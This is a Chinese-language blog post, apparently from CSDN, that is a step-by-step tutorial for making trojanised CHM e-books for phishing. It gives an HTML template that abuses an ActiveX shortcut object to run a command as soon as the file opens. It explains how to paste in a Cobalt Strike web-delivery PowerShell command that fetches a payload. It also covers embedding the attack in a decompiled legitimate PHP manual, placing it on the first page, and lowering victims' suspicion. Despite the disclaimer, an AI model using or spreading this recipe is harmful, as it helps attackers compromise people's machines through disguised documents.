免责声明: 本文用于了解攻击者的攻击手法,切勿用于不法用途
前言
欢迎来到我的博客
个人主页:北岭敲键盘的荒漠猫-CSDN博客
本文主要整理当初电子书的时代,利用电子书攻击的操作
CHM电子书简介
这个在当初普遍用于做教程课件,软件说明等应用。
现在这个用的少了,但是依旧还是有些使用用途。
下面是php的chm教程
这个用来钓鱼还是不错的。
但是一般咱得找点模版,在人家基础上进行编辑。
不然莫名其妙一个奇怪chm太容易被怀疑了。
这个东西其实就是跟网页一样,用h5做的。
制作基础CHM木马
上线模板如下
html
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",填入生成的PS上线命令">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>CS生成web投递指令
填好内容
点运行
复制下面的指令
然后去掉这个命令中的双引号,并且在exe后面加个,
之后复制到模板的指定位置
然后用easy chm去制作chm电子书
创建一个项目,把这个html文件添加进去
完成之后点编译
生成木马,chm文件在对应目录的上一个目录
但是这样打开一个啥也没有的chm确实很可疑。
所以我们往往会选择一个正统的chm文本做嵌入。
高级版CHM木马
找一个真正有用的chm文件
这次我们使用这个php文档作为嵌入
这个是成品,我们需要先给他反编译过来。
反编译掉他
插入攻击代码,保存一下。
然后打开即可。
尽量在首页插入,不然他不浏览可能不会中招。
当然从社工角度也可以往后面插,因为一打开提示安全问题也比较怀疑。
